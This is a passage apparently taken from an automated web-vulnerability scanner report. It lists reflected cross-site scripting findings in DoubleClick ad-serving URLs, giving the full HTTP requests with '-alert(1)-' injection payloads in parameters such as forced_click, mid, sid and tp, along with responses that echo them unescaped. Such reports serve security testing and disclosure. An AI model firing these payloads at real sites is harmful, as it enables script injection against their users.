GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=05ed56"-alert(1)-"dde2af71df5&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
net/click%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=05ed56"-alert(1)-"dde2af71df5&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmod
...[SNIP]...

1.32. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [forced_click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86415'-alert(1)-'b736f4a5c56 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=86415'-alert(1)-'b736f4a5c56 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5979
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 01:44:38 GMT
Expires: Mon, 14 Feb 2011 01:44:38 GMT

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
3aae/7/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=86415'-alert(1)-'b736f4a5c56http://lp2.turbotax.com/ty10/bn/gdestp?cid=bn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_&priorityCode=4654700000\">
...[SNIP]...

1.33. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [forced_click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7261e"-alert(1)-"ebc0bfc526f was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=7261e"-alert(1)-"ebc0bfc526f HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6299
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 14 Feb 2011 01:44:34 GMT
Expires: Mon, 14 Feb 2011 01:44:34 GMT

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
3aae/7/7d/%2a/q%3B234150289%3B1-0%3B0%3B57930397%3B4307-300/250%3B39601762/39619549/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=7261e"-alert(1)-"ebc0bfc526fhttp://lp2.turbotax.com/ty10/oadisp/ph-1/control_gps_f?cid=bn_vc_f_anb_rncpaut_CRFfgg_ppk_300x250&priorityCode=4654700000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var
...[SNIP]...

1.34. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [m parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f824'-alert(1)-'78ddba2521c was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=67f824'-alert(1)-'78ddba2521c&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:04 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=67f824'-alert(1)-'78ddba2521c&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000\">
...[SNIP]...

1.35. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [m parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d629c"-alert(1)-"dabc82fe9a7 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6d629c"-alert(1)-"dabc82fe9a7&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:00 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6320

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/f%3B234150289%3B0-0%3B0%3B57930397%3B4307-300/250%3B39601731/39619518/11%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6d629c"-alert(1)-"dabc82fe9a7&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/scroll_f%3Fcid%3Dbn_vc_f_anb_rncpaut_ScrFr_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClickTa
...[SNIP]...

1.36. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [mid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4aaee'-alert(1)-'64021cf45b7 was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=5115034aaee'-alert(1)-'64021cf45b7&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:43:56 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6001

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
//ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/u%3B234150289%3B2-0%3B0%3B57930397%3B4307-300/250%3B39865159/39882946/3%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=5115034aaee'-alert(1)-'64021cf45b7&m=6&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/jnsfr%3Fcid%3Dbn_vc_f_anb_rncpaut_Frjns_ppk_300x250_%26priorityCode%3D4654700000\">
...[SNIP]...

1.37. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [mid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13a69"-alert(1)-"441cf269a49 was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=51150313a69"-alert(1)-"441cf269a49&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:43:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6320

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
/ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/f%3B234150289%3B0-0%3B0%3B57930397%3B4307-300/250%3B39601731/39619518/11%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=51150313a69"-alert(1)-"441cf269a49&m=6&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/scroll_f%3Fcid%3Dbn_vc_f_anb_rncpaut_ScrFr_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlCli
...[SNIP]...

1.38. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca60b"-alert(1)-"9ecef699118 was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627ca60b"-alert(1)-"9ecef699118&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:09 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627ca60b"-alert(1)-"9ecef699118&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var
...[SNIP]...

1.39. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dcb10'-alert(1)-'29a07cd16fe was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627dcb10'-alert(1)-'29a07cd16fe&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627dcb10'-alert(1)-'29a07cd16fe&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000\">
...[SNIP]...

1.40. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f21e"-alert(1)-"c1a80b55da6 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=2746144f21e"-alert(1)-"c1a80b55da6&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:43:43 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6001

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
cape("http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/u%3B234150289%3B2-0%3B0%3B57930397%3B4307-300/250%3B39865159/39882946/3%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=2746144f21e"-alert(1)-"c1a80b55da6&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/jnsfr%3Fcid%3Dbn_vc_f_anb_rncpaut_Frjns_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClic
...[SNIP]...

1.41. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 92ab7'-alert(1)-'6d6e3b013b3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=27461492ab7'-alert(1)-'6d6e3b013b3&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:43:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6341

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
ref=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3aae/f/7d/%2a/q%3B234150289%3B1-0%3B0%3B57930397%3B4307-300/250%3B39601762/39619549/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=27461492ab7'-alert(1)-'6d6e3b013b3&mid=511503&m=6&sid=8627&c=0&tp=8&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/oadisp/ph-1/control_gps_f%3Fcid%3Dbn_vc_f_anb_rncpaut_CRFfgg_ppk_300x250%26priorityCode%3D4654700000\">
...[SNIP]...

1.42. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [tp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3faad"-alert(1)-"dcba53557ab was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=83faad"-alert(1)-"dcba53557ab&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:25 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6021

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
lick%3Bh%3Dv8/3aae/f/7d/%2a/e%3B234150289%3B3-0%3B0%3B57930397%3B4307-300/250%3B40147962/40165749/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=83faad"-alert(1)-"dcba53557ab&forced_click=http%3a%2f%2flp2.turbotax.com/ty10/bn/gdestp%3Fcid%3Dbn_vc_nf_anb_rncpaut_Gsbs_ppk_300x250_%26priorityCode%3D4654700000");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "
...[SNIP]...

1.43. http://ad.doubleclick.net/adj/N5506.150800.3144586890621/B5070033.6 [tp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N5506.150800.3144586890621/B5070033.6

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22cba'-alert(1)-'0a0ea759385 was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N5506.150800.3144586890621/B5070033.6;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=274614&mid=511503&m=6&sid=8627&c=0&tp=822cba'-alert(1)-'0a0ea759385&forced_click=;ord=20110214014309? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Mon, 14 Feb 2011 01:44:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6341

document.write('\n\n<script src=\"http://s0.2mdn.net/8793
...[SNIP]...
